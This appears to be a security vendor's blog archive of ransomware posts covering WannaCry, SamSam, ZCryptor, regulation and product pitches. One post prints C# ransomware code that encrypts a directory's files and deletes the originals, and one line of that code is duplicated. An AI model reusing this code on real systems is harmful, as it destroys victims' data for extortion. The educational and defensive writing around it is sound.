Tag Archives: ransomware

Why did last Friday’s ransomware infection spread globally so fast?

Why did last Friday’s ransomware infection spread globally so fast?

Quick ransomware background

Ransomware is a type of malware that encrypts your data and asks for you to pay a ransom to restore access to your files. Cyber criminals usually request that the ransom be paid in Bitcoins: the #1 cryptocurrency (basically a distributed ledger) which can be used to buy and sell goods. By nature, Bitcoin transactions (e.g. ransom payments) are very difficult to trace.

Historically, most ransomware infections use the attack vector – how they get in – of social engineering (like clickbait from a social media platform – think cute kitty pics on Facebook or Twitter) or email phishing campaigns, which contain attachments or links to a website. The end result is that a malicious payload gets a foothold on a machine inside a corporate network. Unfortunately, all of those next generation perimeter defenses that organizations spend good money on are not that difficult to bypass in order to get inside.

Once inside, most ransomware will scan the internal network to see which servers host file shares, attempts to connect to each share, encrypt its contents, and then demand a ransom be paid to regain access to the now encrypted files. End users can usually access way more data than they should be able to: either through wide open permissions or by accumulating permissions over the course of their employment at their company. Think for a minute just often you’ve stumbled across a folder or files which you know you shouldn’t be able to access. Access controls are out of control. In this case, IT is typically blind because of the sheer complexity of file system permissions.

Good to know, but what was different last week?

Without going too much into the technical details, I can tell you that the code behind the biggest ransomware outbreak in history isn’t actually all that special. It’s a type of cryptoworm: a self-propagating malicious form of malware. That means that once it gets a foothold, it can spread autonomously without the need for someone to remote control it.

Normally, ransomware targets unstructured data hosted on file shares – this ransomware, however, did not discriminate.

In April, several hacking tools created by the NSA were leaked online. These hacking tools exploit vulnerabilities in hardware and software so that they can hack into or move laterally around a computer network.

WannaCry ransomware (also known as WCry / WanaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r) – the type responsible for last Friday’s attack – went a few steps further: once it got onto even a single machine within a corporate network, it did the following:

  • Looped through any open RDP (Remote Desktop) sessions, to encrypt data on the remote machine
  • Sought out any vulnerable* Windows machines – endpoints (laptops/desktops/tablets) and servers using Microsoft vulnerabilities
  • Used the traditional approach of going after file shares directly from the endpoint

*The particular vulnerability that made the difference last week was in the Microsoft SMBv1 file sharing protocol, which was used to hop from machine to machine encrypting data – like a spider web effect. Most internal servers are separated on internal networks so that end users can’t access them. The cryptoworm would need to hit just one internal server (e.g. a file server) and from there it would target whatever vulnerable servers that file server can access. This allowed it to quickly traverse entire networks, effectively crippling many of them. Like many cryptoworms, it’s self-propagating and so replicates itself and searches out to other vulnerable hosts/computer networks worldwide.

The truth is that the worldwide infection could have been much worse if not for the quick thinking of a security researcher. @MalwareTechBlog spotted that the malware code was connecting out to a nonsensical domain, which was not registered. This call out was hard-coded in case the creator wanted to stop it and likely also to help avoid IDS/IPS sandboxing techniques. If the request comes back showing that the domain is live, the “kill switch” kicks in to stop the malicious part of the code from executing – effectively stopping the malware in its tracks. @MalwareTechBlog, acting on a hunch, registered the domain name and was immediately registering thousands of connections every second. The result was that he stopped what could have been a much wider spread infection.

The bad news is that new versions of the code are already in development: https://www.bleepingcomputer.com/news/security/with-the-success-of-wannacry-imitations-are-quickly-in-development/

Lessons Learned

Microsoft released a patch (software code update to fix vulnerabilities) for this particular SMBv1 vulnerability back in March. The sad truth of the matter is that proper vulnerability patch management processes would mean that most organizations would not have been so badly affected.

That’s not to say that vulnerability patch management processes are enough coverage for ransomware. Nor are backups, since some ransomware will hide in your backups so that after you restore files they will simply attack again.

There is no one stop shop for stopping ransomware infections or any cyber security threat for that matter. Security is all about risk reduction – and requires a layered approach with controls in place at each layer while leveraging solutions to automate processes wherever possible. If any organization says that they’re 100% safe from cyber-attacks, then they’re either delusional or telling you porky pies!

🚨 Massive Ransomware Outbreak: What You Need To Know

🚨 Massive Ransomware Outbreak: What You Need To Know

Remember those NSA exploits that got leaked a few months back? A new variant of ransomware using those exploits is spreading quickly across the world – affecting everyone from the NHS to telecom companies to FedEx.

Here’s What We Know So Far

Ransomware appears to be getting in via social engineering and phishing attacks, though vulnerable systems may also be at risk if TCP port 445 is accessible. Unlike most ransomware that encrypts any accessible file from a single infected node, this ransomware also moves laterally via exploit (i.e., EternalBlue) to vulnerable unpatched workstations and servers, and then continues the attack. Unpatched windows hosts (Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, and 2016) running SMB v1 are all vulnerable.

Infected hosts are running strains of ransomware, such as Wanna Decrypt0r (more below) that encrypts files and changes their extensions to:

  •  .WRNY
  • .WCRY (+ .WCRYT for temp files>
  • .WNCRY (+ .WNCRYT for temp files)

The Ransomware also leaves a note with files named @Please_Read_Me@.txt, or !Please_Read_Me!.txt, and will display an onscreen warning.

Here’s What You Can Do

MS17-010, released in March, closes a number of holes in Windows SMB Server. These exploits were all exposed in the recent NSA hacking tools leak. Exploit tools such as EternalBlue, EternalChampion, EternalSynergy and EternalRomance (all part of the Fuzzbunch exploit platform) all drop DoublePulsar onto compromised hosts. DoublePulsar was created by the NSA and is basically a malware downloader, which is used as an intermediary for downloading more potent malware executables onto infected hosts.

If you’re an existing DatAlert customer, you can set up office hours with your assigned engineer to review your threat models and alerts. Don’t have DatAlert yet?  Get a demo of our data security platform and see how to detect zero-day attacks.

DatAlert Customers

If you’re a DatAlert Analytics customer, the threat model “Immediate Pattern Detected: user actions resemble ransomware” was designed to detect this and other zero-day variants of ransomware; however, we also strongly recommend that you update the dictionaries used by DatAlert signature-based rules. Instructions for updating your dictionaries are here: https://connect.varonis.com/docs/DOC-2749

If for some reason you can’t access the connect community, here is how to update your dictionaries to include the new extensions for this variant:

Open the DatAdvantage UI > Tools > Dictionaries > Crypto files (Predefined)

Open the DatAdvantage UI > Tools > Dictionaries > Encrypted files (Predefined)

Details

Vulnerabilities

The Malware exploits multiple Windows SMBv1 Remote Code vulnerabilities:

Windows Vista, 7, 8,10, server 2008, 2008 R2, 2012, 2012 R2, 2016 are all vulnerable if not patched and SMBv1 Windows Features is enabled.

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Ransomware strains

WCry / WannaCry / WannaCrypt0r / WannaCrypt / Wana Decrypt0r

This outbreak is version 2.0 of WCry ransomware which first appeared in March. Until this outbreak, this ransomware family was barely heard of. Though likely spread via phishing and social engineering attacks, if tcp port 445 is exposed on vulnerable windows machines, that could be exploited using the Fuzzbunch exploit platform.

Other helpful links

 

Planet Ransomware

Planet Ransomware

If you were expecting a quiet Friday in terms of cyberattacks, this ain’t it. There are reports of a massive ransomware attack affecting computers on a global scale: in the UK, Spain, Russia, Ukraine, Japan, and Taiwan.

The ransomware variant that’s doing the damage is called WCry, also known as WannaCry or WanaCrypt0r. It has so far claimed some high-profile targets, including NHS hospitals in the UK, and telecom and banking companies in Spain.

Be calm and carry on, of course.

In the blog, we’ve been writing about ransomware over the last two years, and we have great educational resources to help you prevent or reduce the damage of an attack.

Here’s a quick overview of our content.

What is it?

Our ransomware guide: https://blog.varonis.com/the-complete-ransomware-guide/ 

Learning more

The Troy Hunt course: https://blog.varonis.com/introduction-to-ransomware-course/

How it spreads

Yes, it can have worm-like features: https://blog.varonis.com/next-gen-ransomware-ransomworm-gets-deadlier/

Can I make my own (for research purposes)?

Yes, but only under adult supervision:

https://blog.varonis.com/malware-coding-lessons-for-it-people-part-ii-more-fun-with-fud-ransomware/

https://blog.varonis.com/malware-coding-lessons-people-part-learning-write-custom-fud-fully-undetected-malware/

Reducing the risk

Limiting file access really, really helps: https://blog.varonis.com/the-best-ransomware-defense-dont-have-files/

Legal and Regulatory Implications

For US companies, this is what you need to know: https://blog.varonis.com/ransomware-the-legal-cheat-sheet-for-breach-notification/

Should you pay?

It depends:

https://blog.varonis.com/should-the-website-that-infected-a-pc-with-ransomware-pay/

https://blog.varonis.com/hospital-paid-ransom-didnt-get-all-files-back/

Is a decryption solution available?

Check here: https://www.varonis.com/ransomware-identifier/

The ultimate answer to ransomware

User Behavior Analytics (UBA): https://blog.varonis.com/why-uba-will-catch-the-zero-day-ransomware-attacks-that-endpoint-protection-cant/

And here’s proof:  https://www.varonis.com/ransomware-solutions

 

 

 

Update: New York State Finalizes Cyber Rules for Financial Sector

Update: New York State Finalizes Cyber Rules for Financial Sector

When last we left New York State’s innovative cybercrime regulations, they were in a 45-day public commenting period. Let’s get caught up. The comments are now in. The rules were tweaked based on stakeholders’ feedback, and the regulations will begin a grace period starting March 1, 2017.

To save you the time, I did the heavy lifting and looked into the changes made by the regulators at the New York State Department of Financial Services (NYSDFS).

There are a few interesting ones to talk about. But before we get into them, let’s consider how important New York State — really New York City — is as a financial center.

Made in New York: Money!

To get a sense of what’s encompassed in the NYDFS’s portfolio, I took a quick dip into their annual report.

For the insurance sector, they supervise almost 900 insurers with assets of $1.4 trillion and receive premiums of $361 billion. Under wholesale domestic and foreign banks — remember New York has a global reach — they monitor 144 institutions with assets of $2.2 trillion. And I won’t even get into community and regional banks, mortgage brokers, and pension funds.

In a way, the NYSDFS has the regulatory power usually associated with a small country’s government. And therefore the rules that New York makes regarding data security has an outsized influence.

One Rule Remains the Same

Back to the rules. First, let’s look at one key part that was not changed.

NYSDFS received objections from the commenters on their definition of cyber events. This is at the center of the New York law—detecting, responding, and recovering from these events—so it’s important to take a closer look at its meaning.

Under the rules, a cybersecurity event is “any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information …”

Some of the commenters didn’t like the inclusion of “attempt” and “unsuccessful”. But the New York regulators held firm and kept the definition as is.

Cybersecurity is a broader term than a data breach. For a data breach, there usually has to be data access and exposure or exfiltration. In New York State, though, access alone or an IT disruption, even when attempted (or executed but not successfully) is considered an event.

As we’ve pointed out in our ransomware and the law cheat sheet, very few states in the US would classify a ransomware attack as a breach under their breach laws.

But in New York State, if ransomware (or a remote access trojan or other malware) was loaded on the victim’s server and perhaps abandoned or stopped by IT in mid-hack, it would indeed be a cybersecurity event.

Notification Worthy

This leads naturally to another rule, notification of a cybersecurity event to the New York State regulators, where the language was tightened.

The 72-hour time frame for reporting remains, but the clock starts ticking after a determination by the financial company that an event has occurred.

The financial companies were also given more wiggle room in the types of events that require notification: essentially the malware would need to “have a reasonable likelihood of materially harming any material part of the normal operation…”

That’s a mouthful.

In short: financial companies will notify the regulators at NYSDFS when the malware could seriously affect an operation that’s important to the company.

For example, malware that infects the digital console on the bank’s espresso machine is not notification worthy. But a key logger that lands in a bank’s foreign exchange area and is scooping up user passwords is very worthy.

The NYDFS’s updated notification rule language, by the way, puts it more in line with other data security laws, including the EU’s General Data Protection Regulation (GDPR).

So would you have to notify the New York State regulator when malware infects a server but hasn’t necessarily completed its evil mission?

Getting back to the language of “attempt” and “unsuccessful” found in the definition of cybersecurity events, it would appear that you would but only if the malware lands on a server that’s important to the company’s operations — either because of the data it contains or its function.

State of Grace

The original regulation also said you had to appoint a Chief Information Security Officer (CISO) who’d be responsible for seeing this cybersecurity regulation is carried out. Another important task of the CISO is to annually report to the board on the state of the company’s cybersecurity program.

With pushback from industry, this language was changed so that you can designate an existing employee as a CISO — likely a CIO or other C-level.

One final point to make is that the grace period for compliance has been changed. For most of the rules, it’s still 180 days.

But for certain requirements – multifactor authentication and penetration testing — the grace period has been extended to 12 months, and for a few others – audit trails, data retention, and the CISO report to the board — it’s been pushed out to 18 months.

For more details on the changes, check this legal note from our attorney friends at Hogan Lovells.

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Can Our Crystal Ball Hack It? 2017 Varonis Cybersecurity Predictions

Everyone makes predictions at this time of year, but who looks back to check on their accuracy? Let’s have a look at some of last year’s omens before directing our forecast lens to 2017.

Our first prediction for 2016: The U.S. Presidential campaign will be affected by a cyber attack.

We were on to something here, but we should have said numerous attacks. From Wikileaks exposing internal campaign emails to allegations that Russia attempted to affect the outcome, security became a front-and-center issue.

We also predicted: Ransomware damage will double.

We had the right direction but the problem actually became far worse than our modest foreboding (a real kick in the crystal ball). While 2015 saw about $325 million in ransom from CryptoLocker alone, 2016 will likely hit $1 billion in ransomware damages according to the FBI.

Amid the hacked ruins, compromised confidences and costly shakedowns of 2016 is the realization that privacy can never truly be assured for modern communications.

Let’s see what 2017 will bring.

1. Extortionware will be the new lucrative thing.

Ransomware’s more targeted, more difficult and more lucrative cousin, will emerge and cause major financial damages because of the sheer size of the payouts demanded when highly sensitive data is threatened with exposure. This will go largely unreported for reasons of discretion, making the prescience of this prediction conveniently unverifiable next year.

2. Ransomware will continue to be a major thing (and backups aren’t enough).

Ransomware will continue to grow in terms of the sheer number and frequency of attacks on organizations. IT best practices for defending against ransomware will expand from backup remediation to early detection and alerting as user behavior analytics become more intelligent and predictive. Stopping an attempted attack – before or right after it starts – is far more efficient and less painful than figuring out which files were affected and restoring them from backup.

3. Threats within will drive the need for smarter security analytics.

Adoption of security analytics will increase, as insider threats continue to get CXO and board-level attention. Insiders have legitimate access to systems and data, so preventing initial access is more than impractical. Detection is the next line of defense for employees or contractors who abuse their access, and to reveal insider credentials that are stolen.

4. Goodbye, ads. Hello, blockers.

The use of ad blockers will skyrocket after another major media site becomes a distributor of malware (as Forbes was in 2016) and users take more deliberate command of their own protection against growing malware threats.

5. Weaponizing IoT will become a regular occurrence.

IoT (Internet of Things) devices such as DVRs and security cameras will become more frequent targets for attackers. While the devices themselves may not all contain valuable data, they represent potential stepping stones on a hacker’s path to steal digital assets. The Mirai botnet, capable of some of the biggest attacks yet and able to reach high volumes with minimal ramp-up time, will threaten the adoption of IoT applications as device makers realize they must make security a design principle or lose their markets.

6. You’re hired, Ms. IT Security Candidate.

With $1 trillion predicted to be spent globally on cybersecurity between 2017 and 2021 and more than 200,000 security jobs currently unfilled in the U.S., computer security skills will continue to be the hottest kind in the IT job market in terms of the number of unfilled jobs and the compensation levels.

7. Organizations will need to save users from themselves.

User education on password hygiene and recognizing potential attacks will continue to increase but the reality will sink in that vigilance alone will not suffice, as phishing and malware become more and more difficult for even careful employees to detect. Organizational remedies will become more widespread to protect their employees, customers, partners, and themselves.

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Malware Coding Lessons for IT People, Part II: Fun With FUD Ransomware!

Let’s not overthink ransomware! It’s just a small malicious piece of code with one devious goal — encrypting all of the user’s important files. It the unfortunate victim wants to recover them he or she will have to pay a hefty amount to retrieve the decryption key.

How hard is ransomware?

In this post, I’ll show you how incredibly easy it is to code a FUD (Fully Undetected) ransomware using public Microsoft libraries with C#.

Ransomware 101

As I discussed in my previous post, there are a few ways to get infected with malware – for starters, malicious attachments, rogue websites, and phishing campaigns, as well as some other creative methods I’ll cover in a future post.

Ok, say we’ve clicked on a malicious ransomware file. What’s going to happen next? Persistency!

Persistency is the code used by hacker to enable the malware to survive restarts and to disguise the software so it would be hard to detect (and remove). While persistency is (usually) generic across many different malware families, there are some unique techniques for ransomware. I’ll get into this in a future post.

At its core, ransomware is just software that performs bulk encryption of the data contents in the victim’s file system. Typically, asymmetric encryption — with different keys for encryption and decryption — is preferred by hackers since it is much harder to recover the data.

This asymmetric algorithm is based on the idea of encrypting the files contents with a public key, but using a different private key that only that attacker has for decryption. You can learn more about asymmetric encryption here: https://en.wikipedia.org/wiki/Public-key_cryptography.

The malware can also choose a weaker encryption method, such as symmetric encryption algorithm, in which the same key is used for both encryption and decryption.

To make the code even simpler, we will use an API that does the symmetric encryption algorithm.

And Now the Code

The next part of the software that newbies need to know about is traversing the file system. Essentially, you’re travelling through the directory hierarchy, collecting file pathname, and then feeding the file contents to the encryption engine. Then of course the file has to be written back.

The list of the files to be encrypted is usually the ones companies are dependent on. We’re talking documents, spreadsheets, images, presentations, audio, and emails. By the way, hackers usually will not encrypt movies due to the size and the impact on the malwares performance. That’s a small consolation—employees can be watching movies while IT is restoring from a backup.

Once the files list is generated after navigating the directories, it’s a good idea to wait for an appropriate time to start the encryption. The idea is to then encrypt as much file contents as possible from the list before being detected.

More sophisticated ransomware will attempt to learn the idle time of the infected computer — when there’s CPU available– and slip in the encryption processing at appropriate times to avoid detection.

Enough talk, here’s the code.

First snippet: Choose a random key to encrypt the data with:

string key = "R?\n??i??";

Basically you can choose any key that you like, remember that we are going to choose symmetric algorithm so the key will be used for encrypting and decrypting as well.

Second snippet:   Encrypt an entire directory contents:

private static void EncryptDir(string d,int mili)
        {
            DirectoryInfo dirtoencrypt = new DirectoryInfo(d);
            FileInfo[] file;
            file = dirtoencrypt.GetFiles();
            foreach (FileInfo currentFile in file)
            {
                if (currentFile.Extension.ToLower() != ".exe")
                {
                    string key = "R?\n??i??";
                    EncryptFile(currentFile.FullName, currentFile.FullName + ".axx", key);
                    File.Delete(currentFile.FullName);
                   Thread.Sleep(mili);
                }
            }
        }

 

Third Snippet: The encrypting function, taken directly from MSDN (https://support.microsoft.com/en-us/kb/307010)

static void EncryptFile(string sInputFilename, \
static void EncryptFile(string sInputFilename, string sOutputFilename, string sKey)
        {
            FileStream fsInput = new FileStream(sInputFilename,
             FileMode.Open,
             FileAccess.Read);

            FileStream fsEncrypted = new FileStream(sOutputFilename,
               FileMode.Create,
               FileAccess.Write);
            DESCryptoServiceProvider DES = new DESCryptoServiceProvider();
            DES.Key = ASCIIEncoding.ASCII.GetBytes(sKey);
            DES.IV = ASCIIEncoding.ASCII.GetBytes(sKey);
            ICryptoTransform desencrypt = DES.CreateEncryptor();
            CryptoStream cryptostream = new CryptoStream(fsEncrypted,
               desencrypt,
               CryptoStreamMode.Write);

            byte[] bytearrayinput = new byte[fsInput.Length];
            fsInput.Read(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Write(bytearrayinput, 0, bytearrayinput.Length);
            cryptostream.Close();
            fsInput.Close();
            fsEncrypted.Close();
        }


 

That’s it!

A malicious tool with tons of damage potential in less than a 100 lines of code and under 10kb after compiling.

I’ll put together more pieces of the ransomware puzzle in another post.

New SamSam Ransomware Exploiting Old JBoss Vulnerability

New SamSam Ransomware Exploiting Old JBoss Vulnerability

One of the lessons learned from the uptick in ransomware attacks is that it pays to keep your security patches up to date. A few months ago the SamSam/Samas malware was (and is still) having great success primarily against healthcare companies and hospitals.

The attack vector, though, was not based on phishing or social engineering. SamSam instead exploits a very old (and surprising) vulnerability in JBoss, Red Hat’s Java-based web server environment.

No Phishing

JMX is the administrative console web app for JBOSS — yes, everything starts with a J. Unfortunately, by default, the JMX home page is available externally without any authentication checks.

Like any good admin took, JMX gives you access to some basic functions including running Java code.

Are you thinking what I’m thinking?

Hackers discovering this JBoss vulnerability quickly realized that if they could upload a simple shell they were on their way to controlling the server.

And that’s the way this exploit works. If you want to read the technical details and the coding involved, you can google on “jboss vulnerability”.

This is a very well-known security hole – the CVE dates back to 2010—and it has since been patched.

But it has come back into the limelight because the SamsSam ransomware has very successfully used it against healthcare orgs, which for whatever reasons are more likely to have JBoss installations.

Once the cyber thieves gain entry through JMX, they upload the ransomware. And start collecting the fees. No phishing required.

How bad is the problem?

According to Cisco security researchers, there could be as many as 3.2 million installations at risk.

Remote Access Trojan by Any other Name

Attackers can find sites that have JBoss by Google dorking, which allows you to search for part of the telltale URL – in this case “jmx-console”—that indicates a JBoss server on an exposed site.

jmxconsole

It’s an admin console! It’s a remote access trojan! It’s both!

In looking at the JBoss attack techniques, I saw lots of code where the JMX interface acts as starting point to uploading and launching other software, say a reverse shell. So the vulnerability leaves open other attacks, not necessarily ransomware.

To put it bluntly, the JMX interface is an unintentional Remote Access Trojan or RAT, which we wrote about in our pen testing series.

Normally the attacker has to first install the RAT, but with these unpatched Red Hat installations it’s there — gasp!— waiting for them.

Maybe it’s a good time now to bring all your systems up to date with the latest security patches — I’m talking to you healthcare orgs!

 

One Take Away from Black Hat 2016: Designer Ransomware!

One Take Away from Black Hat 2016: Designer Ransomware!

We had an amazing week at Black Hat 2016.  One topic that was on attendees’ minds— besides hacking Jeeps and chip-and-pin technology — was ransomware. A security analysis firm now warns us that ransomware has become more clickable because the thieves are localizing the phish mail.

You should watch the video below for the full interview with an analyst from Sophos.

The key takeaway is that the ransomware designers have learned some marketing tricks from non-criminal enterprises.

These digital bandits know to focus their efforts on richer countries that can afford to pay the ransomware and then customize the email contents using very local companies and brands.

So you may receive a nicely crafted email with the name and logo of, say, a utility company or government agency. The hackers have gotten better at working out the location of the victims based on their IP addresses.

With the attackers improved powers of “market segmentation”, we’re a long way from one-size-fits-all Nigerian 419 schemes!

You and I could easily spot that the sender of the email containing the malware is phony – see our phish mail post — but the average employee might not.

Of course, your company should be boosting employee security budgets to make it less likely that workers will click on an UPS invoice.

More than that, though, companies should lower their overall risk exposure surface. It just makes sense, as Rob has just pointed out, to limit the files that the attacker can access in the first place.

We’ll be talking more about ransomware next week when we present the results of a custom survey that we’re finishing up.

 

 

Banks Secretly and Silently Struggling with Ransomware

Banks Secretly and Silently Struggling with Ransomware

“You’re almost certainly not going to hear about successful ransomware attacks on banks,” says Fraud Prevention Expert, Ross Hogan in an interview with Banking Exchange. “It is probably one of the most catastrophic events that a bank could suffer.”

Why?

If a financial institution made a public announcement that the firm was infected with ransomware, the brand damage would be irreparable.

Moreover, it could potentially create panic amongst customers, ensuing a bank run. Customers might decide to withdraw cash from a financial institution, destabilizing a bank to where it runs out of cash and unexpectedly face bankruptcy. The result of this scenario would be – from an economic standpoint – catastrophic.

And NO ONE wants this to happen.

But we know financial institutions are a target

How? Ransomware does not discriminate.

All it takes is one phishing click or a wrong installation and your computer or your entire network could take a hit. (Listen to our podcast: Journey of a Ransomware Attack)

“They’re not just trying to infect your workstation and lock your files on you workstation; they’re trying to go for any network drive they can find,” says Editor-in-Chief of Cyberheist Stu Sjouwerman. “That’s where the risk is. This is what happened at Presbyterian Hospital in Hollywood.”

Not only has ransomware infected hospitals, but schools, police departments, and city departments – all institutions that we rely on.

The financial industry took note. Last year, the Federal Financial Institutions Examination Council issued a ransomware warning about the frequency and severity of the threat.

What banks can do

Be proactive and learn how you can protect your organization from the inside out:

How Varonis helps financial services stop and prevent ransomware

We’ve been working with organizations from all verticals to prevent ransomware. And here are a few quotes from a few financial institutions that describe their experience with how Varonis helps them stop and prevent ransomware:

  • “Even though we have a state of the art firewall and new antivirus software, neither was able to detect or stop Crypto. Varonis DatAlert not only sent us email alerts when a user got hit by Crypto, but also logged that user out before the virus could do any damage to network shares. That alone justified its cost.” – Southern California Wealth Management Firm
  • “Our endpoint protection had detected the virus on a computer and had appropriately removed the code, but not before it had kicked off the encryption process. The point to note here is that although the endpoint had isolated the problem it wasn’t able to kill the process. Varonis was able to identify the process and then remediate the issue and we can prevent it from happening again.” – A Northwestern Bank
  • “ Of all the expensive security products we’ve purchased, DatAlert is the only solution that has done, and is doing, all of the alerting and notification of anomalous behavior, especially ransomware. ” – A Major Bank in Western Canada

 

 

How to Identify Ransomware: Use Our New Identification Tool

How to Identify Ransomware: Use Our New Identification Tool

Sadly, ransomware infections are routine enough that IT departments have started to develop standardized procedures for rapidly quarantining infected machines, determining the extent of damage and then attempting recovery operations..

For help with locking off computers performing suspicious actions (like modifying thousands of files in a minute), our DatAlert customers are using custom rules and scripts tied to behaviors. They’re running reports in DatAdvantage to rapidly find exactly which files were touched on which servers. However, until recently Varonis has been unable to help with recovery efforts.

While restoring files from backup is the best recovery option, often you’re still left with files which were created since the last backup was taken or in cases where the infection wasn’t promptly caught: where the files encrypted by the ransomware themselves were backed up.

If you’re in this situation, you need to:

    1. Identify the strain of ransomware you’ve been hit with.
    2. Locate an unlocking application (if any) for that strain.

To help with both of these recovery tasks, we’ve created a Ransomware Identifier. Enter either the file extension of the ransomware encrypted files, or the name of the ransom note file into the Ransomware Identifier search engine and rapidly get your answers.

Try the Ransomware Identifier Now

Next-Gen Ransomware (Ransomworm!) Gets Deadlier

Next-Gen Ransomware (Ransomworm!) Gets Deadlier

Ransomware developers have been busy adding more deadly functions to their evil creations. First we heard about DDOS capabilities appearing in modified versions of Cerber.  Now Microsoft reports that a new ransomware variant has the power to spread like a worm.

Known as ZCryptor, it infects other users by dropping an autorun.inf file into removable files – at a practical level, thumb drives that are attached to laptops, as well as network drives.

In other words, employees who are copying files onto USBs will be unwittingly spreading ZCryptor throughout the office.

Wormy Ransomware

Some are calling this new variant ransomworm. Surprisingly, this is not a new idea in malware history.

The first-ever virus, known as Brain, was essentially DOS-based ransomware that propagated through floppy disks. An infected diskette was made unreadable, and the victims had to call a phone number (in Pakistan) to get “inoculated”.

All the standard prevention and mitigation techniques apply to ZCryptor. Train your staff about identifying phish mails, keep up to date backups, review access rights of folders, and of course monitor with user behavior analytics software to detect unusual file access.

Varonis UBA vs. ZCryptor

User Behavior Analytics or UBA is a new technology that’s up to the challenge of preventing your files from being taken away from you and ransomed.

Without any configuration, our Varonis UBA threat models spot the signs of ransomware activity — when files are being encrypted — and therefore can stop these attacks without having to rely on a static list of signatures as is the case with conventional virus scanners.

Once detected, a series of automated steps can be triggered to prevent ransomware infections like ZCryptor from spreading.

Worried about ransomware? Learn how Varonis User Behavior Analytics can save you some bitcoins!